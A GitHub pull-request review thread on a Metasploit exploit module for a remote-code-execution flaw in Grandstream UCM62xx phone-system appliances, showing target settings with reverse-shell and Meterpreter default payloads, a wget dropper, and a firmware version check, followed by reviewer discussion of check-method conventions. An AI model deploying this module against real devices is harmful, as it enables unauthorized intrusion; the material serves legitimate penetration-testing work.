modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb

```diff
@@ -0,0 +1,176 @@
+                'DisableNops' => true,
+                'BadChars' => '\'&|'
+              },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'RPORT' => 8089,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  ##
+  # Sends a POST /cgi request with a payload of action=getInfo. The
+  # server should respond with a large json blob like the following,
+  # where "prog_version" is he firmware version:
+  #
+  # {"response"=>{
+  #   "model_name"=>"UCM6202", "description"=>"IPPBX Appliance",
+  #   "device_name"=>"", "logo"=>"images/h_logo.png", "logo_url"=>"http://www.grandstream.com/",
+  #   "copyright"=>"Copyright \u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.",
+  #    "num_fxo"=>"2", "num_fxs"=>"2", "num_pri"=>"0", "num_eth"=>"2", "allow_nat"=>"1",
+  #    "svip_type"=>"4", "net_mode"=>"0", "prog_version"=>"1.0.18.13", "country"=>"US",
+  #    "support_openvpn"=>"1", "enable_openvpn"=>"0", "enable_webrtc_openvpn"=>"0",
+  #    "support_webrtc_cloud"=>"0"}, "status"=>0}
+  ###
+  def check
+    normalized_uri = normalize_uri(target_uri.path, '/cgi')
+    print_status("Requesting version information from #{normalized_uri}")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalized_uri,
+      'vars_post' => { 'action' => 'getInfo' }
+    })
+
+    return CheckCode::Unknown('HTTP status code is not 200') unless res&.code == 200
+
+    body_json = res.get_json_document
+    return CheckCode::Unknown('No JSON in response') unless body_json
+
+    resp_json = body_json['response']
+    return CheckCode::Unknown('The JSON response is missing the response element') unless resp_json
+
+    prog_version = resp_json['prog_version']
+    return CheckCode::Unknown('The JSON response is missing the prog_version element') unless prog_version
+
+    print_status("The reported version is: #{prog_version}")
+
+    version = Rex::Version.new(prog_version)
+    if version < Rex::Version.new('1.0.19.20')
+      return CheckCode::Appears('This determination is based on the version string.')
+    end
+
+    return CheckCode::Safe('This determination is based on the version string.')
```

Comment:
```suggestion
      return CheckCode::Appears('This determination is based on the version string returned from /cgi.')
    end

    return CheckCode::Safe('This determination is based on the version string returned from /cgi.')
```

Suggestion for making this a little bit clearer to the end user where you got this information from, otherwise your saying you got a version string from somewhere, but the user won't know where you got it from.

Reply:
> Suggestion for making this a little bit clearer to the end user where you got this information from, otherwise your saying you got a version string from somewhere, but the user won't know where you got it from.

No-one cares where the version came from, but printing the version may be useful.

Reply:
For what it's worth, the version is printed on line 116.

Reply:
I'd also point out that line 98 specifically says where the version is being requested 🤷

Reply:
> For what it's worth, the version is printed on line 116.

It does, but it uses `print_status` which is forbidden in a `check` method. The module can return the version in the CeckCode description instead.

Reply:
Oh interesting, I didn't realize that print_status wan't allowed in `check`. I guess [https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method](documentation) indicates it's discouraged, but I'd be lying if I said I'd read that 😬 

Noted. Thanks @bcoles!

Reply:
Fixed `print_status` x2 and added the version to the `CheckCode` return.